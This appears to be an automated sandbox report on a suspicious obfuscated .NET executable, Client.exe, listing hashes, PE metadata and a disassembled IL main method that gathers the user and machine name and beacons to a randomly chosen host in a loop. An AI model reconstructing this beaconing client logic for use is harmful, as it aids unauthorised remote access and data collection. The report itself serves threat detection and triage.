Suspicious
Suspect

6a32c4ab92cb87031744702b3cd65ea6

PE Executable | MD5: 6a32c4ab92cb87031744702b3cd65ea6 | Size: 524.3 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
6a32c4ab92cb87031744702b3cd65ea6
Sha1
e6c91ac8388a42fd1f87819adaf25ea15d494702
Sha256
e4f1163ae08e51ea8206a3a88c24e7db04b18b6208ed3aef68caf0fdd0e23cd0
Sha384
4148e2ee50544b1085f8d6d22ad348af1abe3321131d199342db1bfe07556148cdab7c590982d64041f677ab7b7d5318
Sha512
fd2a95fea6c96facd12f19dfe7afd8f44e7796f0767664e348bb9a95e3e9ba9c9028d4c36588f731754b097f3d2ad6e6947023503fa4835dd257ff2b1c17e668
SSDeep
12288:lBxznrnMEvK15UFo8SkIOPipFPgA8z2PFck:dMWWGFIkzPsk
TLSH
43B408257F998E10D584287ECA7E3A09CB12E0F225027343374AF6A25D459DEDE2D3DB

PeID

Microsoft Visual C++ 8
Microsoft Visual C++ 8.0
File Structure
.Net Resources
xr1sr7qlzam62x
kv5wb0nvwaultc2kge39ffzqbd0e
Information
Name
Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK

Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_05c631a8.exe

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

573

Main Method

System.Void UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::FDZGvLBAGVeLRR(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::rgElIbRkXVNSciKPaRTJBYt() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::kWhsoqQluN() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uVWWqpbyPDOnTmwI() stloc V_3 nop <null> ldloc V_3 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::FyrTmBAltYwgFcXONQuD() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() br IL_000E: nop call System.Void UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::AWZyRiRAtxetBKtOOkrb() call System.Void CUxoMbvVgcXMoGKxVoaK.vnbNcMlqMWYAZgrFEdFeFZy::SSMAUbgpSd() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CMYsrFjdKefl call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::oBQSvVDeMRXWOSGPvZl() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Void cZVjefEwnZsnjJOHvXH.xCLWyHXCIbK::ZbTMNShaOylW() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::arbAboicUdnGhooKkoQQc call System.Boolean wtSRwNLztBh.jTuSSeSkbAcFvndHtMa::VQanbghlGC(System.String) brtrue IL_0080: call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() leave IL_0283: ret call System.Void VyHSXcRzLM.HHfQdTwyzmTeak::EkSigycMPRhklrVQPWF() call System.Void cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fHmOFAMiuXXriubneGl() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brtrue IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::CFyiiCXKwOUgdrCQpS 
call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::dTZadzVjNGshhfvVBHUVkwQf() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::KbqYGWCFnceStJB() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::CfSEyXxbsLIZhJhCuIS() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fKHkpctDRDIySqiQy() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::SmdOguNcXevbXkqdAr() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iOWetKoDKGrbQETqf() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QeMWNEPIpgXHpqqsPMvIkErr() ldelem System.String call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::VgDeXEuLjj() newarr System.Char dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::LMASOlVIfDRBkY() call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::GuXJMmVTrYMdSbdvGGdgDL() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::kypNenEEiFoJ() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldloc V_1 call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::tziiLzEfSGhxAoZXaqs() ldelem System.String ldloc V_2 ldsfld System.Random cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::hZGJvoVTijWzZsydSXqspqOqO ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void 
CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::bCUOveIAYUxYqhrVRTfYrWUOZ(System.String,System.String) ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldfld System.Boolean CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::tfxYnujCeJrFmtVOsHFPN brfalse IL_026E: call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld ZGKdGVjBKjXL.ikvjuArYzCVioRacGypC CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::gfIYnrhIiDadhybmaKjU ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse newobj System.Void cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL::.ctor(CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL) stfld cZVjefEwnZsnjJOHvXH.CegegShSsNSDiL CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::TLqIxCtNMPrZNzS ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::uCHCgCHKuHrl() newarr System.Object dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::QdKdEJTmstXkddHhiCqKCjrr() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::zmNzndpjmAbAfjLUhlco() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::BJsukLOwDjKOtWgYXBI() call System.Byte[] cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::rTUkrdfonFQOSYHpsOqsxaNG() stelem.ref <null> dup <null> call System.Int32 
UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::RCZzdMEBashlTxCzbsIiI() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::lUVQJYyOGuT stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::atwSofJlfiiHOyksQYGMVK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::hRyLoWoWPvIBphvDHZ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::ZuwThxesab() call System.String System.Environment::get_UserName() call System.String UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AsvRXRtvfMCIjf() call System.String ICBoxomyjLFsoECXlq.yWNFMwfgGBALcRewqezJWhu::KrWiBaAupHrOAxjPr(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::cfCKXYroNyCMjEPibkb() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::kFOuAXqJXQ stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::TPrXXsMcoApIgkWFpGBiUgxD() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::KRfdmgcRRTSVPZPJpQYpEV stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::iNPRPDIyfJMnfmeM() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::EvypZrEfnhcECfqw stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::AMIugyhJsVitbm() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::oGrQEEIIItLTtowMAZjBY stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::nBofwKYxhJAaKRK() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::wlgiSjyVlNAszbloxainqDZMo stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::WVFflvcCOiIWhZF() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::STEyLKGpvGp stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::XuzdxzQEbPb() ldsfld 
System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::LQAIWrxPnTPuCNOYaSsQmTl stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::fXXrhCMXVGhsZmQNCBQHE() ldsfld System.String UDwkSDviHXxdnSAbVjsyd.mngRlnxbhlJYaIXpg::QLszPQxRKLMJhJcUrGA stelem.ref <null> dup <null> call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::DPShVWFAEVTrXrKQpeNhiQNGE() call System.String cZVjefEwnZsnjJOHvXH.aqWtVCkNqINVtMyLHWtl::fDBuaXSzRrAZXwfpOfZY() stelem.ref <null> call System.Byte[] ZNRPfvuZnQCEteylUNIvZ.PxSHxfkHRdTMmZayyPpNaY::MKbifLnZcMrNFw(System.Object[]) callvirt System.Void CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL::ZyKtPKSmkXRLYCStPkjFuVZk(System.Byte[]) call System.Int32 UDwkSDviHXxdnSAbVjsyd.DJPtROBZnfuo::jCCZzTgiTHZAh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld CUxoMbvVgcXMoGKxVoaK.YVhdZSGQEqxkulEqbUGhJL UDwkSDviHXxdnSAbVjsyd.eWrKzxAWWxkqAFrQpYZfTie::ZetihWvlAEmse pop <null> leave IL_0283: ret ret <null>

Artefacts
Name
Value
PE Layout

MemoryMapped (process dump suspected)

Characteristics
No malware configuration was found at this point.
Artefacts
Name | Value | Location
PE Layout | MemoryMapped (process dump suspected) | 6a32c4ab92cb87031744702b3cd65ea6
PE Layout | MemoryMapped (process dump suspected) | 6a32c4ab92cb87031744702b3cd65ea6 > [Rebuild from dump]_05c631a8.exe
